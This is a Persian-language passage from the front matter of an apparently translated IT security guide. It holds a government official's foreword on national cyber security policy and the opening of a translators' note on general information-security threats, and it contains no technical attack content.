ﻣﻲﭘﺬﻳﺮﺩ ،ﻧﻴﺎﺯ ﺑﻪ ﻧﻈﺎﻡﻫﺎﻱ ﺣﻔﺎﻇﺖ ﻭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺖ ﺿﻤﺎﻧﺖ ﻣﺒﺎﺩﻻﺕ ﻭ ﺍﻳﺠﺎﺩ ﺗﻌﻬﺪ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻃﺮﻓﻬﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﻣﺒﺎﺩﻟـﻪ
ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ .ﻧﻈﺎﻡﻫﺎﻳﻲ ﻣﺸﺘﻤﻞ ﺑﺮ ﻗﻮﺍﻧﻴﻦ ،ﺭﻭﺷﻬﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻋﻘﻮﺩ ﻣﺘﺪﺍﻭﻝ ﻭ ﺭﻭﺷﻬﺎﻱ ﺳﻨﺘﻲ ﺗﻌﻬﺪﺁﻭﺭﺗﺮ
ﺑﻮﺩﻩ ﻭ ﺿﻤﻨﹰﺎ ﺍﻣﻨﻴﺖ ﻭ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺒﺎﺩﻟﻪﺷﺪﻩ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺗﻀﻤﻴﻦ ﻧﻤﺎﻳﻨﺪ.
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﻣﺠﺎﺯﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﻛـﺎﺭﺑﺮﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﻭ ﻓﺮﺍﮔﻴـﺮ ﺍﺯ
ICTﻣﻮﺭﺩ ﺗﺎﻛﻴﺪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﮔﺮﭼﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﻣﺤﻴﻂ ﻭﺍﻗﻌﻲ ﻭ ﭼﻪ ﺩﺭ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﺩﺳﺖﻧﻴـﺎﻓﺘﻨﻲ ﺍﺳـﺖ ،ﻭﻟـﻲ ﺍﻳﺠـﺎﺩ
ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻭ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻧﻴﺎﺯﻫﺎ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺎﺷﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄـﻲ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺍﺳﺖ .ﺗﻨﻬﺎ ﺑﺎ ﻓﺮﺍﻫﻢ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺳﺖ ﻛﻪ ﺍﺷﺨﺎﺹ ﺣﻘﻴﻘﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ،ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﻭ ﺍﺭﮔﺎﻧﻬـﺎﻱ ﺩﻭﻟﺘـﻲ ﺿـﻤﻦ
ﻻ ﻫﻴﭽﮕـﺎﻩ ﻳﻜـﺪﻳﮕﺮ ﺭﺍ ﻧﺪﻳـﺪﻩ ﻭ
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﻃﺮﻓﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﻳﻚ ﺗﺒﺎﺩﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺧﻴﻞ ﻫﺴﺘﻨﺪ ﻭ ﺍﺣﺘﻤـﺎ ﹰ
ﻧﻤﻲﺷﻨﺎﺳﻨﺪ ،ﻧﻘﺶ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﮔﺮﻩﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﻌﺎﻣﻞ ﻭ ﻫﻢﺍﻓﺰﺍ ﺭﺍ ﺍﻳﻔﺎ ﺧﻮﺍﻫﻨﺪ ﻧﻤﻮﺩ.
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺳﺮﻣﺎﻳﻪ ﻫﺎﯼ ﺍﻃﻼﻋﺎﺗﯽ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻛﺸﻮﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﺍﺑﻌـﺎﺩ ﮔـﺴﺘﺮﺩﻩ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ،ﮐﻠﻴـﺪ ﻗﻔـﻞ
ﻓﺮﺻﺘﻬﺎﯼ ﺑﯽﺷﻤﺎﺭ ﺗﺠﺎﺭﯼ ﻭ ﻏﻴﺮﺗﺠﺎﺭﯼ ﺟﺪﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﯽ ﺍﺳﺖ .ﺁﻧﭽﻪ ﻣﺴﻠﻢ ﺍﺳﺖ ﭼـﺎﻟﺶ ﺍﻣﻨﻴﺘـﯽ ﺭﻭﺩﺭﺭﻭﻱ ﻛـﺸﻮﺭ ﻋـﺪﻡ ﺩﺳﺘﺮﺳـﯽ ﺑـﻪ
ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﺎ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﯽ ﻧﻴﺴﺖ ،ﺑﻠﮑﻪ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ،ﻓﺮﻫﻨﮓﺳﺎﺯﻱ ،ﺑﻬﺮﻩﻭﺭﻱ ﻣﻨﺎﺳﺐ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺟﻮﺩ ﻭ ﻧﻴﺰ ﺳﺎﺯﮔﺎﺭﯼ
ﺁﻧﻬﺎ ﺑﻪ ﮔﻮﻧﻪﺍﯼ ﺍﺳﺖ ﮐﻪ ﻧﻴﺎﺯ ﻣﻨﺤﺼﺮﺑﻪﻓﺮﺩ ﺷﺒﮑﻪ ﻭ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺸﻮﺭ ﺭﺍ ﺗﺄﻣﻴﻦ ﮐﻨﺪ .ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺗﻮﺟﻪ ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺿـﺮﻭﺭﻱ
٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺟﺎﺭﻱ ﺩﺭ ﻣﻌﻤـﺎﺭﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﻣﻠـﻲ ﻭ
ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺑﻪ ﺗﻨﺎﺳﺐ ﻭ ﻧﻴﺎﺯ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ .ﻧﻜﺘﺔ ﻣﻬﻢ ﺩﻳﮕﺮ ﺣﺎﺻﻞ ﺍﺯ ﺗﺠـﺎﺭﺏ ﻛـﺸﻮﺭﻫﺎﻱ
ﭘﻴﺸﺮﻭ ﺣﺎﻛﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺄﻟﻪﺍﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺍﺳﺖ ﻭ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﺩ .ﺍﻳﻦ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻫـﻢ
ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﻭ ﻫﻢ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺗﻌﻴﻴﻦ ﻧﻘﺸﻬﺎ ،ﻭﻇﺎﻳﻒ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﻧﻜﺎﺕ ﻣﻬﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ
ﻫﻤﻜﺎﺭﻳﻬﺎ ﺑﺎﻳﺪ ﺗﻌﺮﻳﻒ ﺷﻮﻧﺪ.
ﺍﻣﺮﻭﺯﻩ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭﺟﻪ ﺗﺎﺯﻩﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻫﺮ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ .ﺍﻣﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺗﻮﺳﻌﻪ ﺳـﺮﻳﻊ
ﻛﺎﺭﺑﺮﻱﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻳﺮﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﻮﺷﺶ ﺑﺮﻧﺎﻣﺔ ﺗﻜﻔﺎ ،ﺑﺎ ﺷﻨﺎﺧﺖ ﻭ ﺗﻌﻴﻴﻦ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﻛﻠﻴﺪﻱ ﻛﺸﻮﺭ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺣﻴﺎﺗﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﻧﺪ ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ،ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳـﻦ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ،ﻣﺴﻴﺮ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﺔ ﻛﺸﻮﺭ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺍﻧﺎﻳﻲﻣﺤﻮﺭ ﻫﻤﻮﺍﺭ ﮔﺮﺩﺩ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺩﺭ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻭ ﭘﺲ ﺍﺯ ﺗﺼﻮﻳﺐ ﺑﺮﻧﺎﻣﺔ ﺗﻮﺳﻌﺔ ﻭ ﻛﺎﺭﺑﺮﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )ﺗﻜﻔﺎ( ﺩﺭ ﻫﻴـﺄﺕ ﺩﻭﻟـﺖ
ﻛﻪ ﻧﺸﺎﻥ ﺍﺯ ﺗﻮﺟﻪ ﻭ ﺑﻴﻨﺶ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﻛﺸﻮﺭ ﺩﺭ ﺭﻭﻳﻜﺮﺩ ﻧﻮﻳﻦ ﺑﻪ ﺗﻮﺳﻌﻪ ﻛﺸﻮﺭ ﺩﺍﺷـﺘﻪ ،ﻣﻄﺎﻟﻌـﺎﺕ ﻭ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ ﺗﻤﻬﻴـﺪ
ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻏﺎﺯ ﺷﺪﻩ ﻭ ﺭﺷﺪ ﺳﺮﻳﻌﻲ ﻳﺎﻓﺘﻪ ﺍﺳـﺖ .ﻧﺘـﺎﻳﺞ ﻣﻄﺎﻟﻌـﺎﺕ ﻛـﺎﺭﮔﺮﻭﻩ ﻣـﺮﺗﺒﻂ ،ﻣﻨﺠـﺮ ﺑـﻪ
ﺷﻨﺎﺧﺖ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻭﺳﻴﻌﺘﺮ ﻧﻴﺎﺯ ﮔﺮﺩﻳﺪ ﻭ ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﺑﺎ ﺗﺼﻮﻳﺐ ﻫﻴﺄﺕ ﻣﺤﺘﺮﻡ ﺩﻭﻟﺖ ﻭ ﺭﺋﻴﺲ ﻣﺤﺘﺮﻡ ﺟﻤﻬـﻮﺭ ،ﺷـﻮﺭﺍﻱﻋـﺎﻟﻲ ﺍﻣﻨﻴـﺖ
ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﺸﻮﺭ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﻌﺎﻭﻥ ﺍﻭﻝ ﻣﺤﺘﺮﻡ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺍﻧﺸﺎﺍﷲ ﺑﺰﻭﺩﻱ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎ
ﻭ ﺗﺼﻤﻴﻤﺎﺕ ﺩﺭ ﻗﺎﻟﺐ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺳﻨﺪ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺸﻮﺭ ﺍﻋﻼﻡ ﻣﻲﮔﺮﺩﺩ.
ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺩﺭ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺗﻼﺵ ﺩﺍﺭﺩ ﺗﺎ ﺑﺎ ﺗﻬﻴـﻪ ،ﺗﺮﺟﻤـﻪ ﻭ ﺗـﺄﻟﻴﻒ ﻣﻄﺎﻟـﺐ ﻓﻨـﻲ ﺩﺭ ﻣﺤـﻴﻂ
ﻣﻨﺎﺳﺐ ﻧﺴﺒﺖ ﺑﻪ ﺗﻘﻮﻳﺖ ﺩﺍﻧﺶ ﻣﻮﺟﻮﺩ ﻛﺸﻮﺭ ﺩﺭ ﻗﻠﻤﺮﻭﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﺪ .ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﺟﻤﻠﻪ ﺍﺳﻨﺎﺩ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ،ﺟـﺎﻣﻊ
ﻭ ﻣﺘﺄﺧﺮ ﺩﺭ ﻗﻠﻤﺮﻭ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ICTﻛﺸﻮﺭ ﻫﺪﻳﻪ ﻣﻲﮔﺮﺩﺩ.
ﻧﺼﺮﺍﷲ ﺟﻬﺎﻧﮕﺮﺩ
ﺩﺑﻴﺮ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ
ﻧﻤﺎﻳﻨﺪﻩ ﻭﻳﮋﻩ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ
ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ
ﺍﺳﺘﻔﺎﺩﺓ ﺩﺭﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺻﺤﻴﺢ ،ﻳﻜﻲ ﺍﺯ ﻧﻴﺎﺯﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﺍﻫـﺪﺍﻑ ﺳـﺎﺯﻣﺎﻧﻲ ﺍﺳـﺖ ﻭ ﻗﺎﺑﻠﻴـﺖ
ﺍﻃﻤﻴﻨﺎﻥ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ،ﺍﺯ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺩﺭ ﮐـﺎﺭﺁﻳﻲ ﺁﻧﻬـﺎ ﻫـﺴﺘﻨﺪ .ﻣﺰﺍﻳـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ
ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮐﺎﺭﺑﺮﺩ ﻭﺳﻴﻊ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺭﺍ ﻧـﺎﮔﺰﻳﺮ ﮐـﺮﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺑـﻮﻳﮋﻩ
ﺍﻳﻨﺘﺮﻧﺖ ،ﺗﻐﻴﻴﺮﺍﺕ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭ ﺭﻭﻧﺪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﮐﻪ ﺣﺠﻢ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻳﻚ ﺳـﺮ
ﺍﻧﮕﺸﺖ ﺑﺎ ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؛ ﻭ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﭘﻴﭽﻴـﺪﻩ ﺑـﺎ ﺍﻳـﻦ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭﺳـﻴﻊ ،ﻣﺨـﺎﻃﺮﺍﺕ ﮔـﺴﺘﺮﺩﻩﺍﻱ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ،ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﮐﻨﻨﺪ.
ﺩﺭ ﺩﻧﻴﺎﻱ ﺍﻣﺮﻭﺯ ،ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺎﻟﻲ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﺑﺼﻮﺭﺕ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺟﺎﺑﺠﺎ ﻣﻲﺷﻮﻧﺪ ،ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺑﺎ ﺣﺴﺎﺳﻴﺘﻬﺎﻱ ﮐﻢ ﻭ ﺯﻳـﺎﺩ
ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﮑﻪﻫﺎ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ،ﺳﺎﻣﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻭ ﻣﺮﺗﺒﻂﺗﺮ ﺑـﺎ ﺩﻧﻴـﺎﻱ ﺑﻴﺮﻭﻧـﻲ ﻣـﻲﮔﺮﺩﻧـﺪ ،ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﺎﺩﺓ ﻧﻔﻮﺫ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺎﺟﺮﺍﺟﻮﻳﺎﻥ ﻭ ﺟﻨﺎﻳﺘﮑﺎﺭﺍﻥ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻗﺮﺍﺭ
ﺩﺍﺭﺩ؛ ﻭ ﻫﺮﻳﮏ ﺍﺯ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﺧﻮﺩ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺩﻟﻴﻞ ﻣﺤﮑﻤﻲ ﺑﺮﺍﻱ ﺟﺪﻱ ﮔﺮﻓﺘﻦ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺍﺳﺖ.
ﺍﮐﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﻮﺍﻉ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺧﺮﺍﺑﮑﺎﺭﺍﻥ ﻫﺴﺘﻨﺪ؛ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻮﻥ ﺩﺳﺘﮑﺎﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﺮﺟﻊ ﻭ ﻳﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ .ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ،ﻋﻮﺍﻣﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﺷـﻤﺎﺭ
ﺭﻭﻧﺪ )ﻣﺜﻞ ﺳﺮﻋﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻ( ،ﺍﮔﺮ ﺗﺤﺖ ﮐﻨﺘﺮﻝ ﻧﺒﺎﺷﻨﺪ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺷﻮﻧﺪ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺑﺪﻧﻴﺖ
ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻧﻔﻮﺫ ﻭ ﺧﺮﺍﺑﻜﺎﺭﻱ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﻭ ﻳﺎ ﺍﺧﺎﺫﻱ ﺑﻴﺎﻧﺠﺎﻣﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﻣﺸﻜﻼﺕ ﻃﺒﻴﻌـﻲ ﻭ ﺧﻄﺎﻫـﺎﻱ ﻏﻴﺮﻋﻤـﺪﻱ ﻛـﻪ ﺗﻮﺳـﻂ
ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ،ﺩﺭﺻﻮﺭﺕ ﻓﻘﺪﺍﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻣﺨﺮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ.
ﺩﺭ ﮐﻨﺎﺭ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ،ﻣﻮﺿﻮﻉ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺮ ﭘﻴﭽﻴﺪﮔﻲ ﮐﺎﺭ ﺩﻭﻟﺘﻬـﺎ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺣﻴﺎﺗﻲ ﺧﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﻣﻲﺍﻓﺰﺍﻳﺪ ،ﻭ ﺍﻫﻤﻴﺖ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺩﻭﻟﺘﻲ ،ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺻﺤﻴﺢ ﻭ ﻣﺆﺛﺮ ﺁﻧﻬﺎ ﺑﻪ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﻭ
